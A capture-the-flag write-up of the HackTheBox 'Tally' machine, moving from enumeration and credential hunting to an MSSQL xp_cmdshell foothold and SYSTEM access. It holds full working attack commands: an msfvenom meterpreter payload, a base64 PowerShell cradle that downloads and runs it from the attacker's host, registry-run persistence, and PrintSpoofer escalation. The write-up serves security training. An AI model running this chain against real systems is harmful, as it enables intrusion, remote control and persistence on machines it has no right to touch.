HackTheBox Tally
Writeup for HackTheBox Tally
HackTheBox Tally
Machine Synopsis
Tally can be a very challenging machine for some. It focuses on many different aspects of real Windows environments and requires users to modify and compile an exploit for escalation. Not covered in this document is the use of Rotten Potato, which is an unintended alternate method for privilege escalation. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
❯ nmap -p- --min-rate 10000 10.10.10.59
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-http
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
❯ nmap -p 21,80,81,135,139,445,808,1433,5985,15567,32843,32844,32846,47001 -sC -sV 10.10.10.59
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-22T02:27:26
|_Not valid after: 2055-01-22T02:27:26
| ms-sql-ntlm-info:
| 10.10.10.59:1433:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_ssl-date: 2025-01-22T02:30:38+00:00; -15m38s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open http Microsoft IIS httpd 10.0
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-01-22T02:30:38+00:00; -15m38s from scanner time.
|_http-title: Service Unavailable
32846/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -15m38s, deviation: 0s, median: -15m38s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-01-22T02:30:16
|_ start_date: 2025-01-22T02:27:12
Lets add the domain into our /etc/hosts file.
1
2
3
❯ echo -e '10.10.10.59\t\ttally' | sudo tee -a /etc/hosts
[sudo] password for shiro:
10.10.10.59 tally
Check out their website.
It looks like a SharePoint page with no contents.
Lets use a publicly available tool to bruteforce the SharePoint directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
❯ wget https://raw.githubusercontent.com/bhasbor/SharePointURLBrute-v1.1/refs/heads/master/SharePointURLBrute%20v1.1.pl
❯ wget https://raw.githubusercontent.com/bhasbor/SharePointURLBrute-v1.1/refs/heads/master/SharePoint-UrlExtensions-18Mar2012.txt
❯ perl SharePointURLBrute\ v1.1.pl -a 'http://tally' -e SharePoint-UrlExtensions-18Mar2012.txt
Starting search for common SharePoint Pages
Start Time: Wed Jan 22 11:01:29 2025
FOUND: http://tally/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://tally/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://tally/_layouts/AreaNavigationSettings.aspx
FOUND: http://tally/_Layouts/AreaTemplateSettings.aspx
FOUND: http://tally/_Layouts/AreaWelcomePage.aspx
FOUND: http://tally/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://tally/_layouts/MyInfo.aspx
FOUND: http://tally/_layouts/MyPage.aspx
FOUND: http://tally/_layouts/PageSettings.aspx
FOUND: http://tally/_layouts/policy.aspx
FOUND: http://tally/_layouts/policyconfig.aspx
FOUND: http://tally/_layouts/policycts.aspx
FOUND: http://tally/_layouts/Policylist.aspx
FOUND: http://tally/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://tally/_layouts/SiteDirectorySettings.aspx
FOUND: http://tally/_layouts/sitemanager.aspx
FOUND: http://tally/_Layouts/SiteManager.aspx?lro=all
FOUND: http://tally/_vti_bin/alerts.asmx
FOUND: http://tally/_vti_bin/dspsts.asmx
FOUND: http://tally/_vti_bin/forms.asmx
FOUND: http://tally/_vti_bin/Lists.asmx
FOUND: http://tally/_vti_bin/people.asmx
FOUND: http://tally/_vti_bin/Permissions.asmx
FOUND: http://tally/_vti_bin/search.asmx
FOUND: http://tally/_vti_bin/UserGroup.asmx
FOUND: http://tally/_vti_bin/versions.asmx
FOUND: http://tally/_vti_bin/Views.asmx
FOUND: http://tally/_vti_bin/webpartpages.asmx
FOUND: http://tally/_vti_bin/webs.asmx
FOUND: http://tally/_vti_bin/SharepointEmailWS.asmx
FOUND: http://tally/_vti_bin/spsearch.asmx
FOUND: http://tally/_vti_bin/WebPartPages.asmx
FOUND: http://tally/default.aspx
FOUND: http://tally/shared documents/forms/allitems.aspx
Search Complete
Total # of SP Admin URLs Found: 34
We could also use gobuster to brute force the directories.
1
2
3
4
❯ gobuster dir -u http://tally -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
...
/_layouts/viewlsts.aspx (Status: 302) [Size: 143] [--> /_layouts/15/viewlsts.aspx]
..
Accessing http://tally/_layouts/15/viewlsts.aspx will list the site contents.
Opening the ftp-details.docx reveals the following information.
1
2
3
4
5
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
Now that we have a possible password, we have to find some usernames.
Navigate to http://tally/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx and notice that there is a FinanceTeam page.
Opening the link reveals an interesting information.
Possible username found ftp_user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:shiro): ftp_user
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50302|)
150 Opening ASCII mode data connection.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
It looks like there might be a lot of files. Lets download the entire server to our local machine.
1
❯ wget -r 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'
Use grep to find any interesting information we need.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ grep -riE "password|pass|pwd|secret|config|key|token|cred" 10.10.10.59_ftp
grep: 10.10.10.59_ftp/User/Paul/Monetary_penalties_for_breaches_of_financial_sanctions.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Paul/financial_sanctions_guidance_august_2017.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Paul/financial-list-guide.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Ekta/OFSI_quick_guide_flyer.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Jess/actu8-espreadsheet-designer-datasheet.pdf: binary file matches
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:65,Gasper,Stokey,South State Corporation,3554455475076550,jcb
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:187,Whittaker,Maffi,Harvest Capital Credit Corporation,3578906182504641,jcb
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:226,Deane,De Moreno,"China Commercial Credit, Inc.",337941269432570,americanexpress
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePassLibC64.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/ShInstUtil.exe: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.XmlSerializers.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe: binary file matches
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:KeePass: Copyright (C) 2003-2017 Dominik Reichl <dominik.reichl@t-online.de>.
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:'KeePass.chm'.
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:software. If the software is modified by someone else and passed on, we
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt: `Gnomovision' (which makes passes at compilers) written by James Hacker.
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePassLibC32.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.chm: binary file matches
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:<configuration>
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config: <assemblyIdentity name="KeePass"
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config: publicKeyToken="fed2ed7716aecf5c"
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config: <add key="EnableWindowsFormsHighDpiAutoResizing" value="true" />
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:</configuration>
10.10.10.59_ftp/User/Tim/Project/Log/do to.txt:encrypted share creds:
10.10.10.59_ftp/User/Tim/Project/Log/do to.txt:password in keepass
grep: 10.10.10.59_ftp/User/Sarah/Windows-KB890830-x64-V5.52.exe: binary file matches
grep: 10.10.10.59_ftp/User/Sarah/MBSASetup-x64-EN.msi: binary file matches
grep: 10.10.10.59_ftp/Intranet/Binaries/Firefox Setup 44.0.2.exe: binary file matches
It looks like there is a KeePass file in Tim folder. Lets enumerate the files in the /User directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ cd 10.10.10.59_ftp/User/
❯ ls
Administrator Ekta Jess Paul Rahul Sarah Stuart Tim Yenwi
❯ find . -type f
./Paul/Monetary_penalties_for_breaches_of_financial_sanctions.pdf
./Paul/financial_sanctions_guidance_august_2017.pdf
./Paul/financial-list-guide.pdf
./Ekta/PSAIS_1_April_2017.pdf
./Ekta/OFSI_quick_guide_flyer.pdf
./Jess/actu8-espreadsheet-designer-datasheet.pdf
./Stuart/customers - Copy.csv
./Stuart/Unit4-Connect-Financials-Agenda.pdf
./Tim/Files/tim.kdbx
./Tim/Files/KeePass-2.36/KeePassLibC64.dll
./Tim/Files/KeePass-2.36/ShInstUtil.exe
./Tim/Files/KeePass-2.36/KeePass.XmlSerializers.dll
./Tim/Files/KeePass-2.36/KeePass.exe
./Tim/Files/KeePass-2.36/License.txt
./Tim/Files/KeePass-2.36/KeePassLibC32.dll
./Tim/Files/KeePass-2.36/KeePass.chm
./Tim/Files/KeePass-2.36/KeePass.exe.config
./Tim/Files/bonus.txt
./Tim/Project/Log/do to.txt
./Sarah/Windows-KB890830-x64-V5.52.exe
./Sarah/notes.txt
./Sarah/MBSASetup-x64-EN.msi
Nothing really useful in Sarah notes.txt.
1
2
3
4
5
6
7
8
9
❯ cat ./Sarah/notes.txt
done
install Sharepoint, replace Orchard CMS
to do
uninstall SQL Server 2016
However, we can try to crack Tim KeePass file by converting it into hash and then using john to crack it.
1
2
3
4
❯ keepass2john ./Tim/Files/tim.kdbx > tim.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt tim.hash
...
simplementeyo (tim)
We found the password simplementeyo for the KeePass file. Lets read the KeePass file.
1
2
3
4
5
6
7
8
❯ kpcli --kdb tim.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
Use find . to find all the entries on the file.
1
2
3
4
5
6
7
8
kpcli:/> find .
Searching for "." ...
- 3 matches found and placed into /_found/
Would you like to list them now? [y/N]
=== Entries ===
0. Default
1. PDF Writer
2. TALLY ACCT share
Use show to show the entries.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
kpcli:/> show -f 0
Path: /WORK/CISCO/
Title: Default
Uname: cisco
Pass: cisco123
URL:
Notes:
kpcli:/> show -f 1
Path: /WORK/SOFTWARE/
Title: PDF Writer
Uname: 64257-56525-54257-54734
Pass:
URL:
Notes:
kpcli:/> show -f 2
Path: /WORK/WINDOWS/Shares/
Title: TALLY ACCT share
Uname: Finance
Pass: Acc0unting
URL:
Notes:
It seems like we have a possible usernames and passwords.
Lets note down all the possible users and passwords into user.txt and passwords.txt.
1
2
3
4
5
6
7
8
9
10
❯ cat users.txt
cisco
Finance
ftp_user
❯ cat passwords.txt
UTDRSCH53c"$6hys
simplementeyo
cisco123
Acc0unting
Try to brute force the possible credentials using nxc.
1
2
3
4
5
6
7
8
9
10
11
❯ nxc smb 10.10.10.59 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [-] TALLY\cisco:UTDRSCH53c"$6hys STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [-] TALLY\Finance:UTDRSCH53c"$6hys STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [+] TALLY\ftp_user:UTDRSCH53c"$6hys
SMB 10.10.10.59 445 TALLY [-] TALLY\cisco:simplementeyo STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [-] TALLY\Finance:simplementeyo STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [-] TALLY\cisco:cisco123 STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [-] TALLY\Finance:cisco123 STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [-] TALLY\cisco:Acc0unting STATUS_LOGON_FAILURE
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0unting
It looks like the credential Finance:Acc0unting worked. Lets enumerate the SMB shares.
1
2
3
4
5
6
7
8
9
10
❯ nxc smb 10.10.10.59 -u Finance -p Acc0unting --shares
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0unting
SMB 10.10.10.59 445 TALLY [*] Enumerated shares
SMB 10.10.10.59 445 TALLY Share Permissions Remark
SMB 10.10.10.59 445 TALLY ----- ----------- ------
SMB 10.10.10.59 445 TALLY ACCT READ
SMB 10.10.10.59 445 TALLY ADMIN$ Remote Admin
SMB 10.10.10.59 445 TALLY C$ Default share
SMB 10.10.10.59 445 TALLY IPC$ Remote IPC
It seems that we can access the ACCT share. Lets mount it to our local machine.
1
2
3
4
5
6
❯ sudo mount -t cifs -o user=Finance,pass=Acc0unting //10.10.10.59/ACCT /mnt
[sudo] password for shiro:
❯ cd /mnt
❯ ls
Customers Fees Invoices Jess Payroll Reports Tax Transactions zz_Archived zz_Migration
/mnt ❯
Enumerate around for any interesting information.
1
2
3
4
5
6
7
8
9
10
11
❯ grep -riE "password|pass|pwd|secret|config|key|token|cred" /mnt
...
/mnt/zz_Archived/SQL/conn-info.txt:pass: YE%TJC%&HYbe5Nw
❯ cat /mnt/zz_Archived/SQL/conn-info.txt
old server details
db: sa
pass: YE%TJC%&HYbe5Nw
have changed for tally
We found a set of credentials sa:YE%TJC%&HYbe5Nw. However, this was not useful at all as it seems like the credentials have changed according to the .txt file.
After more enumeration, we find that there is an interesting file called tester.exe.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ ls -l zz_Migration/Binaries
total 463204
drwxr-xr-x 2 root root 0 Aug 29 2017 CardReader
drwxr-xr-x 2 root root 0 Sep 18 2017 Evals
-rwxr-xr-x 1 root root 2241216 Sep 1 2017 FileZilla_Server-0_9_60_2.exe
-rwxr-xr-x 1 root root 74110 Sep 16 2017 ImportGSTIN.zip
-rwxr-xr-x 1 root root 69999448 Aug 28 2017 NDP452-KB2901907-x86-x64-AllOS-ENU.exe
drwxr-xr-x 2 root root 0 Sep 21 2017 'New folder'
-rwxr-xr-x 1 root root 401347664 Aug 28 2017 Sage50_2017.2.0.exe
drwxr-xr-x 2 root root 0 Sep 14 2017 'Tally.ERP 9 Release 6'
-rwxr-xr-x 1 root root 645729 Sep 16 2017 windirstat1_1_2_setup.exe
❯ ls -l zz_Migration/Binaries/New\ folder
total 676308
-rwxr-xr-x 1 root root 18159024 Sep 12 2017 Macabacus2016.exe
-rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root 483824 Sep 16 2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 389188014 Sep 14 2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root 774200 Sep 18 2017 putty.exe
-rwxr-xr-x 1 root root 254599112 Sep 12 2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
-rwxr-xr-x 1 root root 7194312 Sep 14 2017 vcredist_x64.exe
We can try to read the strings of the binary with minimum length of 15.
1
2
3
4
5
6
7
8
❯ strings -n 15 zz_Migration/Binaries/New\ folder/tester.exe
!This program cannot be run in DOS mode.
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad locale name
iostream stream error
...
Nice! We managed to find another set of credentials sa:GWE3V65#6KFH93@4GWTG2G.
Exploitation
Use the newly found credentials to connect to the MSSQL service.
1
2
3
4
5
6
7
8
9
10
11
12
❯ impacket-mssqlclient sa:GWE3V65#6KFH93@4GWTG2G@10.10.10.59
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
Enable the xp_cmdshell and try to run a command.
1
2
3
4
5
6
7
8
9
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
-----------
tally\sarah
NULL
Create a Windows reverse shell and encode our PowerShell command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
❯ pwsh
PowerShell 7.4.6
┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> $command = "(New-Object Net.WebClient).DownloadFile('http://10.10.14.14/shell.exe', 'C:\Users\Public\shell.exe'); Start-Process 'C:\Users\Public\shell.exe'"
┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> Write-Host $encoded KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0AC8AcwBoAGUAbABsAC4AZQB4AGUAJwAsACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHMAaABlAGwAbAAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA==
Copy the encoded command and run it on the xp_cmdshell.
1
2
3
4
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell powershell -e KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0AC8AcwBoAGUAbABsAC4AZQB4AGUAJwAsACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHMAaABlAGwAbAAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA==
After awhile, our Metasploit listener gets a connection from the reverse shell.
1
2
msf6 exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.10.10.59
[*] Meterpreter session 2 opened (10.10.14.14:1234 -> 10.10.10.59:49681)
Before we proceed, we should create persistence.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter> bg
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > options
Module options (post/windows/manage/persistence_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
REXENAME default.exe yes The name to call exe on remote system
REXEPATH yes The remote executable to upload and execute.
RUN_NOW true no Run the installed payload immediately.
SESSION yes The session to run this module on
STARTUP USER yes Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE, TASK)
View the full module info with the info, or info -d command.
msf6 post(windows/manage/persistence_exe) > set session 2
msf6 post(windows/manage/persistence_exe) > set REXEPATH shell.exe
REXEPATH => shell.exe
msf6 post(windows/manage/persistence_exe) > run
[*] Running module against TALLY
[*] Reading Payload from file /home/shiro/Documents/HackTheBox/Tally/shell.exe
[+] Persistent Script written to C:\Users\Sarah\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\Sarah\AppData\Local\Temp\default.exe
[+] Agent executed with PID 6292
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RrbkugOfgGokr
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RrbkugOfgGokr
[*] Cleanup Meterpreter RC File: /home/shiro/.msf4/logs/persistence/TALLY_20250122.1254/TALLY_20250122.1254.rc
[*] Post module execution completed
Now that we have created persistence, we can access the shell and read the user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > shell
Process 4208 created.
Channel 2 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
tally\sarah
C:\Windows\system32>type C:\users\sarah\desktop\user.txt
type C:\users\sarah\desktop\user.txt
cfa7b9ac1d957533f04e1ff7640e35fe
Privilege Escalation
Using meterpreter, we can check the privileges of the current user.
1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
It seems that the current user has SeImpersonatePrivilege. This indicates that we can most likely use getsystem to become Administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1424 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
f70691131d9d11a4e9f510d0c6fcd1c9
Assuming that we do not have this “cheat code”, we can use PrintSpoofer to manually get Administrator.
1
❯ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > upload PrintSpoofer64.exe C:/users/sarah/desktop
meterpreter > shell
Process 7108 created.
Channel 11 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Sarah\Desktop
C:\Users\Sarah\Desktop>PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Alternative way of using PrintSpoofer to get a reverse shell instead.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.14:1234
msf6 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > shell
Process 5840 created.
Channel 12 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\users\sarah\desktop
C:\Users\Sarah\Desktop>PrintSpoofer64.exe -c "shell.exe"
[*] Sending stage (203846 bytes) to 10.10.10.59
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
[*] Meterpreter session 5 opened (10.10.14.14:1234 -> 10.10.10.59:49947)
^Z
Background channel 12? [y/N] y
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows TALLY\Sarah @ TALLY 10.10.14.14:1234 -> 10.10.10.59:49787 (10.10.10.59)
